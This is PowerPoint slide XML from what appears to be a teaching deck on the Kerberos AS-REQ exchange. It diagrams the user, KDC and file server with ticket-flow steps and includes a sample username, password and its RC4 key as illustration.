                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9A9B9AD-B4BE-B1E2-723E-60B3ED645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27258" flipH="1" flipV="1">
            <a:off x="567732" y="1774995"/>
            <a:ext cx="1243646" cy="6218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imple gold key by milovanderlinden">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78672756-C996-994A-A9C4-BFD2477B0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536094" y="3552365"/>
            <a:ext cx="1243646" cy="621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imple gold key by milovanderlinden">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AC8712A-F83B-352D-4570-A60C024D4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327258">
            <a:off x="545102" y="5329732"/>
            <a:ext cx="1243646" cy="62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7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7E8D-016F-9741-7DFE-FEDEF0B3B1FD}"/>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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3817019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E1F5-FDE2-AA26-4E0F-441E5E8761A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="300" noProof="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Authentication: AS-REQ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76FF8F78-8C88-2198-EEF0-D49ED6DEBA73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3141108" y="2418371"/>
            <a:ext cx="1748421" cy="524341"/>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600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rc4_hmac_md5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C914409A-C07C-0C41-25AC-B9D822D57124}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5027503" y="2414265"/>
            <a:ext cx="3109991" cy="52434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300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>56</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>8399599</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>f1be</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>040128</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>b1dd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>9623</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Arrow: Curved Down 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0937758-C30D-0FDA-A709-F5B4B8C7A347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677375" y="2124214"/>
            <a:ext cx="2530774" cy="421109"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 94881"/>
              <a:gd name="adj3" fmla="val 25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BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999C2431-1781-52A1-9AA3-0F27EF7FA06E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10424928" y="1323108"/>
            <a:ext cx="1383902" cy="2085617"/>
            <a:chOff x="10446699" y="1473785"/>
            <a:chExt cx="1130788" cy="1938154"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 2" descr="Server by cyberscooty">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC9A95B4-7B24-D319-1627-541C91793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699" y="1473785"/>
              <a:ext cx="737960" cy="12222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5C2CA71-F4EE-27A2-59C8-A453E287239F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10623454" y="2902107"/>
              <a:ext cx="807040" cy="509832"/>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KDC</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 2" descr="Book by MajinCline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B4556A4-EF35-9453-788C-B250C6855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0449" y="2118230"/>
              <a:ext cx="807038" cy="76222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Flowchart: Alternate Process 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF3A614-6482-7135-E167-510D0BB11926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8747497" y="2685839"/>
            <a:ext cx="822847" cy="371143"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TGT</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Flowchart: Alternate Process 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60C5862E-3913-AAF2-AE67-6DF8916446CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8724060" y="3776004"/>
            <a:ext cx="822847" cy="522322"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ST (TGS)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C1C75E-EF7B-26F0-46B4-02CB76B567CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10439644" y="4008707"/>
            <a:ext cx="955438" cy="1195169"/>
            <a:chOff x="10798720" y="4898278"/>
            <a:chExt cx="1168889" cy="1474940"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 2" descr="Server by cyberscooty">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D8D55CA-9022-23A9-42AA-CB11E0AAE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720" y="4898278"/>
              <a:ext cx="737960" cy="12222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older by computating">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA9286BC-1495-841C-4FDF-C009A48A5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86" y="5548595"/>
              <a:ext cx="824623" cy="82462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E5574687-0307-9A8E-253A-289FAC3DEA5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10439643" y="5241789"/>
            <a:ext cx="955438" cy="524893"/>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File Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Connector: Curved 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B39CCBD-47BA-9385-1D26-0553254FAF6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8137494" y="1426269"/>
            <a:ext cx="2039021" cy="1250167"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31609"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A047D5-9495-9965-EBE8-1E2C1027CB2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8442138" y="1572750"/>
            <a:ext cx="1072729" cy="307778"/>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1. AS-REQ</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18" name="Connector: Curved 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05062C58-A75D-599A-A5B4-6FF3DD2664CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="9158920" y="1849076"/>
            <a:ext cx="1017595" cy="836761"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05123ABF-5986-86BB-7ABA-2D5199FD52BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8982788" y="2108535"/>
            <a:ext cx="1053493" cy="307778"/>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2. AS-REP</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20" name="Connector: Curved 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62DA6998-B462-DEE1-CF39-926C200F14C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="9542808" y="2452913"/>
            <a:ext cx="220181" cy="987956"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99792"/>
              <a:gd name="adj2" fmla="val 70822"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0770F7F9-5628-D6B5-2B66-1F5F62AA9D2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8625355" y="3193120"/>
            <a:ext cx="1200971" cy="307778"/>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3. TGS-REQ</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connector: Curved 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99B18FAD-6260-9B75-16A9-1B0EB5E3B9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9448958" y="3063609"/>
            <a:ext cx="1071507" cy="875606"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4171EF0B-E6C9-EBF7-089D-C935F25A7FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10170118" y="3549887"/>
            <a:ext cx="1181734" cy="307778"/>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4. TGS-REP</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Connector: Curved 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85373998-31E7-4DD7-2CB2-B0F00C63B950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9184608" y="4249201"/>
            <a:ext cx="1205910" cy="1304159"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BBF2203-D957-F026-9273-538926BF255D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8888714" y="4860589"/>
            <a:ext cx="1072729" cy="307778"/>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5. AP-REQ</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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16720A72-1422-19A5-AEC4-A52F1E289167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197871" y="1626865"/>
            <a:ext cx="1759643" cy="659165"/>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sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allan.marshall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sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Awesomesauce123</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 2" descr="male user icon by acspike">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F10BF9BC-1FF2-57DF-E024-D2C89DF063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3" y="1742079"/>
